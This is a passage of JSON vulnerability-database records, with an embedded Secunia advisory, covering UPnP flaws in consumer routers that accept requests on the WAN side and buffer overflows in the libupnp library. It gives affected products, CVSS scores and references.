"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201111-361",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52444",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "VULHUB",
"id": "VHN-52444"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"id": "VAR-201111-0178",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "VULHUB",
"id": "VHN-52444"
}
],
"trust": 1.4788191
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5053"
}
]
},
"last_update_date": "2023-12-18T12:09:30.055000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.cisco.com/"
},
{
"title": "Patch for Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability (CNVD-2011-5053)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6023"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52444"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "NVD",
"id": "CVE-2011-4499"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 2.8,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4499"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4499"
},
{
"trust": 0.6,
"url": "http://www.kb.cert.org/vuls/id/357851http"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "VULHUB",
"id": "VHN-52444"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "VULHUB",
"id": "VHN-52444"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52444"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:04.683000",
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"date": "2012-03-09T00:00:00",
"db": "VULHUB",
"id": "VHN-52444"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2012-03-09T05:00:00",
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
],
"trust": 0.6
}
}
VAR-201111-0160
Vulnerability from variot - Updated: 2023-12-18 12:09

The UPnP IGD implementation in the Pseudo ICS UPnP software on the ZyXEL P-330W allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, thereby exposing the vulnerabilities to the internet. Multiple Universal Plug and Play (UPnP)-compatible routers have vulnerabilities caused by insufficient access restrictions. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. Such UPnP requests arriving on the WAN interface can be used to connect to internal hosts or to proxy connections through the NAT firewall. Remote unauthenticated attackers can exploit the vulnerabilities to scan internal hosts or to proxy Internet traffic through the device.

The following devices are affected:
- Cisco Linksys WRT54G firmware version prior to 4.30.5
- Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1
- Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1
- Cisco Linksys WRT54GX firmware 2.00.05
- Edimax BR-6104K prior to 3.25
- Edimax 6114Wg
- Canyon-Tech CN-WF512 firmware version 1.83
- Canyon-Tech CN-WF514 firmware version 2.08
- Sitecom WL-153 prior to firmware 1.39
- Sitecom WL-111
- Sweex LB000021 firmware version 3.15
- ZyXEL P-330W
- SpeedTouch 5x6 firmware versions prior to 6.2.29
- Thomson TG585 firmware versions prior to 7.4.3.2

ZyXEL P-330W is a wireless broadband router. A vulnerability exists in the UPnP IGD implementation in the ZyXEL P-330W's Pseudo ICS UPnP software. This vulnerability is related to the "external forwarding" vulnerability.

----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/52035/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
This library (libupnp, the Portable SDK for UPnP Devices) is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0160",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "pseudoics",
"scope": "eq",
"trust": 1.6,
"vendor": "genmei mori",
"version": "0.1"
},
{
"model": "pseudoics",
"scope": "eq",
"trust": 1.6,
"vendor": "genmei mori",
"version": "0.3"
},
{
"model": "pseudoics",
"scope": "eq",
"trust": 1.6,
"vendor": "genmei mori",
"version": "0.2"
},
{
"model": "p-330w router",
"scope": "eq",
"trust": 1.0,
"vendor": "zyxel",
"version": "*"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.9,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.9,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.9,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "pseudo ics upnp",
"scope": null,
"trust": 0.8,
"vendor": "genmei mori",
"version": null
},
{
"model": "p-330w",
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "wrt54g beta/2.0",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "4.04.20.6/4.04.0.7/3.03.3.6/3.03.1.3/2.02.4.4/2.02.02.82.00.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:genmei_mori:pseudoics:0.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:genmei_mori:pseudoics:0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:genmei_mori:pseudoics:0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zyxel:p-330w_router:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4504"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4504",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4504",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-52449",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4504",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-366",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-52449",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52449"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation in the Pseudo ICS UPnP software on the ZyXEL P-330W allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 